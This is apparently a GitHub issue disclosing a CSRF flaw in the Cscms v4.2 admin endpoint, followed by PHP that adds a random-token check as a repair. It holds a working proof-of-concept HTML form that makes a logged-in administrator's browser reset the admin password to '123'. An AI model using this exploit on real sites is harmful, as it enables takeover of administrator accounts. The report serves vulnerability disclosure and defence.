Cross-site request forgery vulnerability exists in Cscms music portal system v4.2 #37

Open
Imbrave99 opened this issue May 12, 2022 · 0 comments

Imbrave99 commented May 12, 2022

Details
In cscms v4.2 a problem was found in 1

Cross-site request forgery (CSRF) vulnerability in /Cscms_4.2/upload/admin.php/sys/save allows remote attackers to change the administrator's username and password.
Trigger condition: the administrator clicks a malicious link.

Cause of vulnerability:
We can find that this script has no anti-CSRF mechanism.

Exploit:
A logged-in administrator clicks the URL: http://ip/csrf.html
csrf.html:

```html
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.136.136/Cscms_4.2/upload/admin.php/sys/save" method="POST">
      <input type="hidden" name="adminname" value="admin" />
      <!-- The password you want to change to; here it is 123 -->
      <input type="hidden" name="adminpass" value="123" />
      <input type="hidden" name="sid" value="1" />
      <input type="hidden" name="id" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```

/Cscms_4.2/upload/admin.php/sys/save

Administrator clicks

Success

The password has been successfully changed to 123
Repair method:
Add a random token check
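
One way to implement the random token check named under "Repair method", as an added example that is not part of the original report and is not Cscms code. The function names, the `csrf_token` field and the `handle_sys_save` stand-in are assumptions; the session is passed as an array so the block runs from the PHP CLI.

```php
<?php
// Added example, not Cscms code. Names and the csrf_token field are hypothetical.

// Issue one random token per session; embed it as a hidden field in every admin form.
function csrf_issue_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32)); // CSPRNG, 256 bits
    }
    return $session['csrf_token'];
}

// True only when the request carries the token stored in the session.
function csrf_is_valid(array $session, array $post): bool
{
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    // Reject absent tokens and array input such as csrf_token[]=x.
    if (!is_string($expected) || !is_string($supplied) || $expected === '') {
        return false;
    }
    return hash_equals($expected, $supplied); // constant-time comparison
}

// Stand-in for the sys/save handler: returns the HTTP status it would send.
function handle_sys_save(array $session, string $method, array $post): int
{
    if ($method !== 'POST') {
        return 405; // state changes only via POST
    }
    if (!csrf_is_valid($session, $post)) {
        return 403; // a cross-site form cannot read the session token
    }
    // ... the existing username/password update would run here ...
    return 200;
}

// Constructed requests using the field names from the report.
$session = [];
$token   = csrf_issue_token($session);
$fields  = ['adminname' => 'admin', 'adminpass' => '123', 'sid' => '1', 'id' => '1'];

printf("without token: %d\n", handle_sys_save($session, 'POST', $fields));
printf("wrong token:   %d\n", handle_sys_save($session, 'POST', $fields + ['csrf_token' => 'x']));
printf("valid token:   %d\n", handle_sys_save($session, 'POST', $fields + ['csrf_token' => $token]));
```

In a real handler `$session` is `$_SESSION` after `session_start()` and `$post` is `$_POST`.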
